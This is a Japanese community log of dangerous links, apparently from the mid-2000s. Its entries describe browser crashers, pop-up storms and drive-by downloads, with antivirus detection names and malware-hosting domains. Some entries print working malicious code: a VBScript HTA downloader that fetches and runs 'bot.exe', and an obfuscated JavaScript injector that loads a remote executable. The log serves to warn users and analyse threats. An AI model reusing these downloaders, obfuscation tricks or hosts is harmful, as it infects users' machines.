| 通し番号. | URL( 数字→アルファベット順 )
[確認日/掲載日] 鑑定結果/解説 |
← このようになっています。 |
| [2006/04/13] | 環境により、重い画像を処理させてクラッシュさせるブラクラらしい。
確認すると、こんな感じ のサイト。このページの下のほうは こんな感じ になっている。 私が確認した時はフリーズやクラッシュ等の挙動は無かった。 |
| [2009/11/29] | 確認してみると、まず これ を表示し、許可すると こんな感じ のメール画面を表示する。
このメール画面を閉じると再び これ を表示する。 これ を許可した回数分だけ これ が開く感じであった。 元の画面は こんな感じ で、タスクの強制終了でしか脱出できなかった。 |
| [2010/01/19] | 再確認。mailtoストームのよう。実際に踏むと こんな感じ のサイト。
以下の宛先のメールウィンドウが何枚も開く。タスクの強制終了で脱出可。 bigolbush@whitehouse.com <bigolbush@whitehouse.com> |
| [2008/07/16] | ウィルス名:TSC_GENCLEAN+TROJ_SRIZBI.M |
| [2005/12/26] | バスター無反応だが、以下のアンチウィルスソフトで反応。
BitDefender → BehavesLike:Trojan.ShellHook ClamAV → Worm.Mytob.T-2 Dr.Web → MULDROP.Trojan Kaspersky Anti-Virus → Trojan-PSW.Win32.Gamania.bq NOD32 → a variant of Win32/PSW.Lineage.ON Norman Virus Control → W32/Suspicious_U.gen VBA32 → Trojan-Dropper.Agent.76 |
| [2004/09/09] | セキュリティクラッシュ(ブラウザ落とし)。IEを強制終了させるgif画像。 |
| [2004/05/06] | 荒らし用のスクリプト。踏むとどこかの掲示板に勝手に宣伝を書き込みする。 |
| [2007/03/18] | ウィルス名:TROJ_BRIDGE.A |
| [2006/09/03] | こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。 「cyber.wmf」は以下のURLから来ている。 //cyber-search.biz/cyber.wmf 元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。 |
| [2008/11/10] | ウィルス名:TROJ_AGENTT.R |
| [2006/06/09] | ページ内の以下の項目にはリモホ情報を表示する。また、クリップボードの中身も表示する。
「きみのブラウザ:」← IE6.0 など 「きみのホスト名:」← ***.ne.jp など 「きみの住んでる国:」← JAPAN(JP) など 「きみの住んでる町:」← (Unknown city) など このサイトに関連する以下の記事を参照。 Secunia、他サイトの情報が取得される危険のあるIEの脆弱性を警告 CSSXSS脆弱性よりもっとヤバイ脆弱性がIEに発見されたようですね Internet Explorerの「スクリプトによる貼り付け処理」機能の能力を検証する |
| [2006/10/07] | 「超mixi足あとちょう」と題するページで、クリップボードの中身や、IP情報、Yahoo ID などの情報が表示されるページ。「mixi」をやってる人の情報を抜くトラップらしい。mixiやってる人は注意。 |
| [2005/05/30] | 「hameMov.exe」なるファイルが落ちてくる。バスター無反応だが、以下のアンチウィルスソフトでウィルスを検出。
ClamAV → ウィルス名:Trojan.W32.Msbook Fortinet → ウィルス名:W32/VB.GC-tr mks_vir → ウィルス名:Trojan.Killfiles.U VBA32 → ウィルス名:Win32.Trojan.KillFiles.u |
| [2005/06/10] | IFRAMEタグを大量に使い、//www.freepe.com/i.cgi?kamikazesibuを呼んでいる。 |
| [2007/01/11] | 上記4つのファイルは同一ファイルである。
2006/12/29 に代表して「albumdefotos.exe」「cartaolindo.scr」の2つのファイルをトレンドマイクロ社に提出。 今日、その結果の連絡があり、ウィルス名:TROJ_AGENT.IFX として検出するよう対応、とのこと。 実際に 2006/12/29 にDLした4つのファイルと、今日改めてDLした4つのファイルからウィルス名:TROJ_AGENT.IFX を検出することを確認。 2006/12/29 から今日までのファイルの置き換えは無いと推測される。 |
| [2005/02/22] | //get-sex.net/spanking/ ←@
//get-sex.net/girls-boarding-shool/ ←A //get-sex.net/spanking-online/ ←B 踏むとまず、@に飛ぶ。そこでウィルス名:JAVA_BYTEVER.Aを検出。 検出後、アドレスがurl:ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htmになって「ページを表示できません」となる。 @には別窓1枚がある。それがA。これもいつのまにかurl:ms-its:C:\WINDOWS\Help\iexplore.chm::/iegetsrt.htmになって「ページを表示できません」となる。 Aにも別窓1枚がある。それがB。これは普通に閉じれる。 |
| [2006/09/03] | こんな感じ のサイト。別窓で海外アダルトサイトを表示する。別窓は普通に閉じれる。
また、「cyber.wmf」なるものをDLしろ、と言ってきてウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y を検出。 「cyber.wmf」は以下のURLから来ている。 //cyber-search.biz/cyber.wmf 元のページを閉じると海外アダルトサイトを2枚表示する。これも普通に閉じれる。 稀に //www.bestgall.net/ を表示する時がある。 |
| [2007/06/03] | jpg偽装ファイル。2007/05/06 にトレンドマイクロ社にファイルを提出。
2007/05/30 にその結果の連絡があり、ウィルス名:TSPY_VB.DFN として検出するよう対応、とのこと。 実際に 2007/05/06 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:TSPY_VB.DFN を検出することを確認。 2007/05/06 から今日までのファイルの置き換えは無いと推測される。 |
| [2006/09/01] | 2006/08/13 にトレンドマイクロ社にDL+解凍して現れた「P-DES Pro 1.7.8.exe」ファイルを提出。
今日、その結果の連絡があり、ウィルス名:TROJ_VB.BAY として検出するよう対応、とのこと。 2006/08/13 にDLしたファイルからウィルス名:TROJ_VB.BAY を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:TROJ_VB.BAY を検出することを確認。 |
| [2007/02/03] | 「adv_4.exe」なるファイルが落ちてくる。
2007/01/29 にトレンドマイクロ社にファイルを提出。 2007/02/02 にその結果の連絡があり、ウィルス名:TROJ_AGENT.HYM として検出するよう対応した、とのこと。 2007/01/29 にDLしたファイルからウィルス名:TROJ_AGENT.HYM を検出することを確認。 しかし、今日改めてDLしようとするが、ファイルは落ちてこなかった。 |
| [2004/02/22] | ウィルス名:JAVA_BYTEVER.A |
| [2005/09/13] | 踏むと海外アダルトサイト。別窓が1つ。別窓のURLは //www.pornopony.com/ で、ウィルス名:JS_DLOADER.I を2つ検出。
そのまま20秒くらい放っておくと、再び //www.pornopony.com/ を新窓表示して、ウィルス名:JS_DLOADER.I を今度は3つ検出。 更に放っておくと //hardcore-empire.com/ を新窓表示。これにはバスター無反応であった。 更に放っておくと //hardcore-empire.com/ をまた新窓表示。 その後、何らかの拍子で、ブラクラ並に色々なアダルトサイトを表示する現象を確認。 ブラクラ並に開いたURLの一部が以下。もっとあると思われる。 //hardcore-empire.com/ //awm.porncottage.com/ //www.addictedtoanal.com/galleries.html //www.xclicks.net/sc/ |
| [2008/12/29] | ウィルス名:TROJ_KRYPTIK.BVW |
| [2008/08/15] | 海外アダルトサイトだが、ウィルス名:TSC_GENCLEAN+EXPL_ANICMOO.GEN を検出。
何かのファイルをDLしろ、と催促し、ActiveX の要求もしてくる。 このサイトを閉じると新窓で //hardpornmpg.com/55.php を開いてくるが、こちらのページは真っ白なページで無害と思われる。 |
| [2008/06/29] | 海外アダルトサイトだが、ウィルス名:TSC_GENCLEAN+EXPL_WMF.GEN を検出。
更に「Antivirus 2008」なるページに行き、「AntvrsInstall.exe」をDLしろ、と催促してくる。 |
| [2008/08/26] | ウィルス名:TSC_GENCLEAN+TROJ_VB.HUQ |
| [2008/08/30] | 2重拡張子。ウィルス名:TSC_GENCLEAN+TROJ_AGENT.AHEF |
| [2005/09/17] | 踏むと //www.porninfo.nl に飛び、ブラクラ並に色々なアダルトサイトが開いていく。
その過程でウィルス名:JS_DLOADER.I を検出。 |
| [2005/10/01] | 他の方の結果は以下。
「バスターで踏むと「JS_DLOADER.I」ウイルスを検出します。」 「洋エロサイトですが挙動を見る限りと、あとは勘ですがウィルスあると思います。当方の環境だとVBが反応しませんが、過去の経験からしてJAVAベリファイ、もしくはJAVAバイトバーなどのエロサイトウイルスの挙動と同じです。」 |
| [2005/12/07] | 再確認。踏むと こんな感じ の海外アダルトサイト。
ブラクラ並には開かず、これ1枚のみであった。ウィルスも未検出。 |
| [2006/11/13] | ウィルス+ブラクラ。IFRAMEタグを大量に使い、ブラクラサイトやウィルス憑きサイトを呼び出している。
URLの「〜〜〜〜」の部分は いろいろあるらしい。 しかも、ウィルス+ブラクラだったページはすぐに消えるものもあるらしく、それはページ作成者の気分次第か、tripod.com側による強制ページ閉鎖によると思われる。 |
| [2005/04/09] | ウィルス名:JAVA_BYTEVER.A |
| [2008/08/26] | ウィルス名:TSC_GENCLEAN+TROJ_VB.HUQ |
| [2004/02/22] | NestedHTML[table]tableタグが大量にネスト。無限JavaScript。 |
| [2004/09/30] | このページから //www.virtualave.net/403_error.html の403と思わせるエラーサイトに飛ぶ。
このサイトは「?????????」というウィンドウがいくつも開いた挙句、セキュリティ警告まで出る。 |
| [2004/06/11] | エロサイト。ウィルス名:JAVA_BYTEVER.A |
| [2005/06/09] | 画像は無く、//ne-ebu.com/404/index.htm に飛ばされ、ウィルス名:HTML_MHREDIR.B を検出。 |
| [2005/02/12] | [鑑定結果を編集]
ファイル名(xtreme.exe)でググってみたらこんな文章が出てきた。 −症状− 1、ホームのURLがxtremeがあるページに自動的に書き替えられる。 2、xtremeというソフトが勝手にダウンロードされ、実行される。 3、ダイヤルアップに、xxxdialという接続先が追加される。 4、アダルトサイトの広告ページが開く。 5、バックグラウンドではxxxdialにアクセスしようとしている。 6、デスクトップ及びスタートに、xtremeのショートカットが出来る。 インストールすると、なんか名前を登録するページがまず出る。 で、インストール後のファイルを実行すると「SearchBar」なるものがデスクトップに現れる。 サーチエンジンの便利機能でしょう。 PC無害、ただし当方では“一部がファイアウォールでブロックされました”と出たので、そのような機能が要らない場合踏まないほうがよろしいかと。 ブラウザジャッカーが入っているらしい。 新しくインストールされたものを完全に消去して、IEの設定もリセットするのが吉。 |
| [2006/07/04] | グロ画像のウィンドウがディスクトップ画面内をうろつき始める。グロ画像は確認するたびに違った。
ウィンドウを閉じればそれで終わり。 |
| [2005/05/28] | 「ままろだ1号機」という名の画像Upload掲示板だが、ウィルス名:TROJ_ANICMOO.G+JAVA_BYTEVER.A+JAVA_BYTEVER.C+JAVA_BYTEVER.A-1を検出。
この画像掲示板はIFRAMEタグで//freetop.ru/?haholを呼んでいる。こちらのURL解説も参照。 |
| [2005/06/29] | ウィルス名:HTML_MHTREDIR.AP+JAVA_BYTEVER.A |
| [2005/07/13] | ウィルス名:HTML_MHTREDIR.AP
警告表示で「インターネットサイト http://highconvert.com/system/users/dimpy/ を開けません。アクセスが拒否されました」と出る。 画面は左上のほうにドットサイズの「点」が6個並んでいる。それはIFRAMEタグを使い、width(横)=1 height(縦)=1 の大きさで以下の6つのURLを呼び出している「点」である。
|
| [2005/07/13] | バスター無反応だが、以下のアンチウィルスソフトで反応。
Dr.Web → Trojan.DownLoader.3423 Kaspersky Anti-Virus → Trojan-Downloader.Win32.Agent.rc NOD32 → probably unknown NewHeur_PE |
| [2005/07/13] | ウィルス名:HTML_MHTREDIR.AP を検出。gif画像ではない。
ソースを取得しようとしてもウィルス反応する。 |
| [2005/07/13] | ウィルス名:HTML_MHTREDIR.AP
警告表示で「インターネットサイト http://highconvert.com/system/users/dimpy/chmjpeg/web.php を開けません。アクセスが拒否されました」と出る。 IFRAMEタグで以下のURLを呼んでいる。 //highconvert.com/system/users/dimpy/chmjpeg/counter.gif |
| [2005/07/13] | 「in.hta」という HTML Application が落ちてくる。
バスター無反応だが、以下のアンチウィルスソフトで反応。 ClamAV → VBS.Psyme.F Kaspersky Anti-Virus → Trojan-Downloader.JS.gen (probable variant) NOD32 → VBS/TrojanDownloader.Psyme.NAN メモ帳で開くと以下のスクリプトが現れる。 <script language="vbs"> self.MoveTo 5000,5000 Set shell=CreateObject("WScript.Shell") ddd = shell.SpecialFolders("Fonts") + "\" + "web.exe" set dot=CreateObject("Msxml2.XMLHTTP") dot.Open "GET", "bot.exe", false WScript.Sleep(300) dot.Send() cs = dot.responseBody Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.CreateTextFile(ddd for i = 0 to UBound(cs) c = ascb(midb(cs, i+1, 1)) f.Write chr(c) next f.close shell.run(ddd) window.close() </script> |
| [2005/07/13] | 真っ白なページだが、何かを呼び出している。ソースは以下のたった1行だけである。
<object data=in.php></object> |
| [2005/07/13] | 真っ白なページだが、ソースを見るとスクリプトあり。環境により、以下のexeを落とされる。
//highconvert.com/system/users/dimpy/bot.exe |
| [2004/06/13] | //hikiko_mori.at.infoseek.co.jp/sexy.html に飛ぶ。 |
| [2008/12/29] | ウィルス名:TROJ_EXCHANGE.CI |
| [2005/04/03] | 踏んでみると個人サイトのようだが、CONCONクラッシャーの可能性があるらしい。
WinXPは無害。Win9x系でも最新バッチなら無害。 |
| [2008/12/29] | ウィルス名:TROJ_TIBS.DNZ |
| [2008/08/30] | ウィルス名:TSC_GENCLEAN+Cryp_Xed-3 |
| [2006/08/22] | ウィルス名:DIAL_DIALER.HL |
| [2006/11/05] | 日本語のアダルトサイトのようだが、下のCABファイルをインストールしろ、と連発し、ウィルス名:DIAL_DIALER.HL を検出する。
//hitoriasobi.com/hello/cab/Hot_net2.CAB |
| [2004/11/20] | ウィルス名:VBS_REDLOF.A.GEN 。また、googleのイメージ検索で「hiro」と入れて最初に出てきたURL画像をクリックしてもこのウィルスに感染する。 |
| [2008/12/29] | ウィルス名:TROJ_EXCHANGE.AT |
| [2008/12/29] | ウィルス名:TROJ_EXCHANGE.CR |
| [2005/03/06] | ウィルス名:TROJ_UNABOMBER |
| [2005/02/28] | ウィルス名:TROJ_UY.40 |
| [2004/06/20] | 無限ウィンドウオープン。 |
| [2004/07/16] | ウィルス名:JS_WINBOMB.A。ウィンドウが次々と開く。 |
| [2007/03/18] | IE直踏みでは文字の羅列の表示だが、wmvファイルである。以下の他の方の結果も参照。
「そのURLをIEで踏むと変なソースを表示し、IEが高負荷状態になりました。 Firefoxで踏んでそのファイルをDL後、極窓にかけるとwmvでした。 どうやら、そのファイルをtxtとしてファイル偽装させているため、高負荷になったようです。」 |
| [2005/11/29] | ウィルス名:TSPY_TINY.101 |
| [2006/05/05] | 他の方の結果は以下の「」内。
「「がんば!!」というアラートが閉じても閉じても表示されます。 延々と閉じ続けると最後に「よくできました」と表示されたページが残ります。 それを閉じると「よくできました!!」のアラートが表示され終了です。無限アラート系のブラクラでした。」 |
| [2006/05/05] | 上記の通りに試してみると、踏むと これ が閉じても閉じても表示する。
「OK」をしばらく連打し続けると これ が終わり、 こんな感じ のページを表示する。 それを閉じると これ を表示するが、「OK」を押せば終わりであった。 |
| [2009/12/14] | ファイルサイズ:21.3 KB 。ウィルス名:MAL_BITS |
| [2004/10/09] | 窓がいくつも開くブラクラだがAlt+F4連打で脱出可能。 |
| [2005/09/13] | 再確認。無限ウィンドウオープン。「いたずら」というページが無限に開く。
しかもそのページに「「Alt」+「F4」を連打!」と書いてある。 |
| [2006/03/24] | 再確認。無限ウィンドウオープン。こんな感じ のページを次々と開いていく、
タスクの強制終了をしなくても「Alt+F4」で脱出出来る。 |
| [2005/04/17] | ウィルス名:BKDR_NETBUS.C |
| [2005/12/29] | こんな感じ のページだが、ウィルス名:VBS_REDLOF.A-1を検出。 |
| [2006/01/12] | 再確認。ウィルス名:VBS_REDLOF.A-11 を検出。[2005/12/29]時とウィルス名が少し違う。 |
| [2008/07/16] | ウィルス名:TSC_GENCLEAN+TROJ_STARTPAG.AK |
| [2004/12/14] | ウィルス名:HTML_RIDER.A+JAVA_BYTEVER.A。複数の別窓全画面表示あり。 |
| [2005/04/09] | ウィルス名:JAVA_BYTEVER.A |
| [2004/11/16] | ウィルス名:JAVA_BYTEVER.A。SPYBOT反応:XXXToolbar。 |
| [2005/03/06] | 改めて確認。ウィルス名:JAVA_BYTEVER.A。SPYBOT無反応。 |
| [2008/10/03] | ウィルス名:POSSIBLE_VIRUS |
| [2008/11/10] | ウィルス名:TROJ_SRIZBI.AO |
| [2007/03/25] | ウィルス名:TROJ_Generic |
| [2005/11/03] | 踏むと最初は4〜5枚程度の海外アダルトサイトが開く。放っておくと次々と色々なアダルトサイトが開いていき、ウィルス名:HTML_REDIR.AI+JAVA_BYTEVER.Aを検出するサイトもある。 |
| [2006/07/22] | ウィルス名:TROJ_FAVADD.V |
| [2006/05/03] | こんな感じ サイト。「cyber.wmf」なるファイルをDLしろ、と言ってきてウィルス名:TROJ_NASCENE.Y+EXPL_WMF.GEN を検出。
「cyber.wmf」の発信元は cyber-search.biz である。 |
| [2006/05/03] | 他の方の結果では「Kaspersky反応あり。Exploit.Win32.IMG-WMF 検出。IrfanViewが勝手に起動。」 |
| [2005/05/24] | 「◆ 三菱<D>端末 関連UP板 ◆」という画像掲示板だが悪意ある投稿者により、ウィルス憑きURLが呼び出されている。
ウィルス名:TROJ_ANICMOO.G+JAVA_BYTEVER.A+JAVA_BYTEVER.C |
| [2008/12/29] | ウィルス名:TROJ_NUWAR.ERZ |
| [2005/04/26] | ウィルス名:ADW_HOTSEARCH.A |
| [2008/08/29] | ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.AF |
| [2009/08/11] | ファイルサイズ:85.5 KB 。バスター無反応だが、他社製ウィルス駆除ソフトの多くで反応がある。 |
| [2006/03/24] | 以下のURLに飛んで、「女子高生画像」という画像掲示板に飛ぶ。しかし、延々と何かを読み込んでおり、それが中々終わらない。
//i-bbs.sijex.net/imageBoard.jsp?id=mbn76 |
| [2006/03/01] | 他の方の結果は「2ページ目で Trojan-Downloader.Win32.Agent.acd 検出。」 |
| [2006/03/04] | 「開いた瞬間に何かを強制ダウソさせられまして EXPL_WMF.GEN を検出。」 |
| [2005/07/02] | 画像掲示板だが、悪意ある投稿者により、IFRAMEタグで下のURLを呼び出す投稿あり。
//duvx.com/book.php?book=qattropic ← このURL解説も参照。 この呼び出されるURLはランダムで別のサイトを呼び出す。 その呼び出されるサイトがウィルス憑きだったり、ウィルス無しだったりするため、ウィルス反応する場合や、無反応の場合がある。 検出した場合のウィルス名は → JAVA_BYTEVER.A しかし、新規投稿により、この呼び出される投稿が「次ページ」に沈んでいくので、時間をおいて再確認すると、投稿が削除されない限り、最初のページでは全くの無害になっていくと思われる。 |
| [2004/11/25] | 画像掲示板だが//gb.bbs.ws/book.php?book=xoxを呼び出す投稿あり。
ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1。 SPYBOTが反応し、「Spybot-S&Dは"%s"のダウンロードを遮断しました。」と表示。 |
| [2004/12/30] | 窓を閉じたり、[<前ページ]や[次ページ>]を押すと//lol.to/book.php?book=Premiumを別窓表示。
CoolWebSearch画面が出る。 |
| [2005/01/21] | 「むふふBBS♪」とか言う画像掲示板だが、ウイルスコードらしい物が画像に隠されてると思われる。
ActiveXのインストールとIEのアップグレードを催促するダイアログが出てくる。 2005/01/13,04:07:19に貼られた、画像の出ないこれ↓がそれ。 //homepage1.nifty.com/mineto/img-box/img20050113040719.jpg |
| [2005/07/02] | 画像掲示板だが、悪意ある投稿者により、IFRAMEタグで下のURLを呼び出す投稿あり。
//duvx.com/book.php?book=qattropic ← このURL解説も参照。 この呼び出されるURLはランダムで別のサイトを呼び出す。 その呼び出されるサイトがウィルス憑きだったり、ウィルス無しだったりするため、ウィルス反応する場合や、無反応の場合がある。 検出した場合のウィルス名は → JAVA_BYTEVER.A しかし、新規投稿により、この呼び出される投稿が「次ページ」に沈んでいくので、時間をおいて再確認すると、投稿が削除されない限り、最初のページでは全くの無害になっていくと思われる。 |
| [2006/07/02] | こんな感じ の画像掲示板だが、何かを読み込んでいる。
バスター無反応だが、他アンチウィルスソフトで反応があると思われる。 この類の画像掲示板はタグ使用可なので、それを悪用し、ウィルス憑きURLを呼び出しているためと思われる。 |
| [2006/07/02] | 他の方の結果では
「シニアの掲示板というあぷろだでノートン先生がウイルス反応を示し、何かのインストールを勧めてきます。」 |
| [2006/07/19] | 「「シニア掲示板」とのことですが、開いた直後にブラウザがフリーズし、ノートンがトロイ(Downloader)を検出しました。」 |
| [2005/10/25] | 踏むと こんな感じ のサイト。HDDが唸り出し、この別窓 を表示しつつ、ウィルス名:JS_INOR.ABを検出。その後もHDDが唸り続き、少し経つとウィルス名:VBS_PSYME.ANを検出。
閉じると//www.otsos.ru/index2.htmを表示する。 |
| [2006/06/24] | 他の方の結果では、
「愛犬自慢BBSらしいですが、洋炉エロ画像ばかり貼られてます。9ページ辺りでウイルスバスターが反応して EXPL_WMF.GEN 検出。」 |
| [2004/06/19] | 無限JavaScript。mailtoストーム。「地下室B2階」という所だがmailtoストーム120枚と無限ループ。
直踏みで警告が書いてあるアラートが開く。サイト自体は掲示板だがタグ荒らしにあってるらしい。 |
| [2008/12/29] | ウィルス名:TROJ_DLOADER.QDC |
| [2006/09/29] | 2006/09/16 にトレンドマイクロ社にcabファイルの中の「Daphne.dll」ファイルを提出。
昨日、その結果の連絡があり、ウィルス名:DIAL_CDDIAL.AI として検出するよう対応、とのこと。 2006/09/16 にDLしたファイルからウィルス名:DIAL_CDDIAL.AI を検出することを確認。 また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_CDDIAL.AI を検出することを確認。 ファイルの不定期的な置き換えはほぼ無いと思われる。 |
| [2008/09/28] | ウィルス名:TROJ_Grayware |
| [2006/09/29] | ウィルス名:DIAL_CDDIAL.AI |
| [2008/09/28] | ウィルス名:TROJ_Grayware |
| [2006/09/29] | ウィルス名:DIAL_CDDIAL.AI |
| [2006/09/17] | ウィルス名:DIAL_CDDIAL.AK |
| [2006/09/29] | ウィルス名:DIAL_CDDIAL.AI |
| [2008/09/28] | ウィルス名:DIAL_CDDIAL.AI |
| [2008/09/28] | ウィルス名:DIAL_CDDIAL.AI |
| [2005/04/28] | //googkle.com/に飛び、ウィルス名:JS_PSYME.AFを検出。 |
| [2006/04/18] | 海外アダルトサイト。HDDが唸り出し、そのうち終わる。セキュリティソフトにより、トロイの木馬が検出されるらしい。バスターは無反応。
ソースの中にコード変換されている部分がある。 以下がそれ。長い行なので適当な箇所で改行してある。 ↓ <script language=javascript>document.write(unescape(' %3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61 %76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64 %46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65 %28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68 %2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69 %3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74 %2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64 %65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73 %2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31 %29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E %65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74 %3E'));dF('%264Djgsbnf%2631tsd%264E%2633iuuq%264B00usbggdppm /cj%7B0em0bew633/qiq%2633%2631xjeui%264E2%2631ifjhiu%264E2%264F %264D0jgsbnf%264F1')</script> <script language=javascript>document.write(unescape(' %3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61 %76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64 %46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65 %28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68 %2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69 %3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74 %2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64 %65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73 %2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31 %29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E %65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74 %3E'));dF('%275ECRRNGV%2742CTEJKXG%275F%2744lcxc1encuunqcf0l ct%2744%2742EQFG%275F%2744IgvCeeguu0encuu%2744%2742YKFVJ%275 F3%2742JGKIJV%275F3%275G%272F%272C%275ERCTCO%2742PCOG%275F%2 744OqfwngRcvj%2744%2742XCNWG%275F%2744jvvr%275C11vtchheqqn0d k%7C1fn1nqcfcfx7440gzg%2744%275G%272F%272C%275E1CRRNGV%275G2')</scrpt> ↑ 上を復号化すると下のようになるが、まだ、通常では読みにくいようになっている。 ↓ <script language=javascript>document.write(unescape(' <script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1)); document.write(unescape(t));}</script>'));dF('&4Djgsbnf&31tsd&4E&33iuuq&4B00usbggdppm/ cj{0em0bew633/qiq&33&31xjeui&4E2&31ifjhiu&4E2&4F&4D0jgsbnf&4F1')</script> <script language=javascript>document.write(unescape(' <script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1)); document.write(unescape(t));}</script>'));dF(''5ECRRNGV'42CTEJKXG'5F'44lcxc1encuunqcf0lct '44'42EQFG'5F'44IgvCeeguu0encuu'44'42YKFVJ'5F3'42JGKIJV'5F3'5G'2F'2C'5ERCTCO'42PCOG'5F'44OqfwngRcvj '44'42XCNWG'5F'44jvvr'5C11vtchheqqn0dk|1fn1nqcfcfx7440gzg'44'5G'2F'2C'5E1CRRNGV'5G2')</script> 元の //hui.thumbguru.com/ を表示したまま放っておくと数十秒おきに別のアダルトサイトがランダムに開いていく。 確認すると、以下が開いたURLの順。確認するたびにURLが違うと思われる。放っておくと更に開くと思われる。尚、以下のURLは全てバスター無反応。 //hui.thumbguru.com/cj_out.php?link=gallery94 ← 「ページを表示できません」となった。 //www.papasthumbs.com/ ← 海外アダルトサイト。普通に閉じれる。 //hornyfatbabes.com/ ← 海外アダルトサイト。普通に閉じれる。 //matingworld.com/ ← 海外アダルトサイト。普通に閉じれる。 //www.alexa69.com/?ref=hui.thumbguru.com ← 海外アダルトサイト。普通に閉じれる。 //peegirl.srandel.com/ ← 海外アダルトサイト。閉じると別のアダルトサイトを全画面表示。 //love.funnyboyspics.com/ ← 海外アダルトサイト。普通に閉じれる。 //drunk.piporno.com/ ← 海外アダルトサイト。閉じると別のアダルトサイトを全画面表示。 |
| [2007/05/05] | 真っ白なページでバスター無反応だが、他社製アンチウィルスソフトでは反応があると思われる。
ソースはコード変換されていて読みにくく工夫されている。 |
| [2007/05/05] | 何かの文字列が書かれているページで、ウィルス名:EXPL_ANICMOO.GEN を検出。 |
| [2007/05/05] | 真っ白なページでバスター無反応だが、他社製アンチウィルスソフトでは反応があると思われる。
ソースはコード変換されていて読みにくく工夫されている。 |
| [2008/09/28] | ウィルス名:PAK_Generic.001 |
| [2008/09/28] | ウィルス名:POSSIBLE_HIFRM-5
このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。 |
| [2006/04/07] | こんな感じ のページだが、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.A-1+JAVA_BYTEVER.K+ADW_RENOS.AB を検出。 |
| [2008/07/14] | ウィルス名:TSC_GENCLEAN+TROJ_DLOADER.IXF |
| [2005/02/28] | ウィルス名:BKDR_HACKDEF.84+BKDR_HACDEF.73.B |
| [2004/06/05] | 「何でも画像掲示板」だがブラクラのタグやスパイウェアが貼られていて環境によりIEで踏むと青画面が出て再起動させらる。 |
| [2004/06/24] | ウィルス名:MHTMLRedir.Exploit+Trojan.ByteVerify |
| [2004/07/03] | IEのトップページが書き換えられ、c:\WINDOWS\secure.htmlになってしまう。
c:\windows\hostsが書き換えられ、削除してもすぐに新しいhostsが作成される。 外部に接続できないとエロページに飛ばされる |
| [2004/09/27] | 現在は//duvx.com/book.php?book=NBCが貼られている。 |
| [2009/04/18] | こんな感じ のページ。バスター無反応だが、Kaspersky で Exploit.JS.Agent.agc を検出するらしい。 |
| [2009/08/11] | ファイルサイズ:118 KB 。ウィルス名:TSPY_ONLING.IT |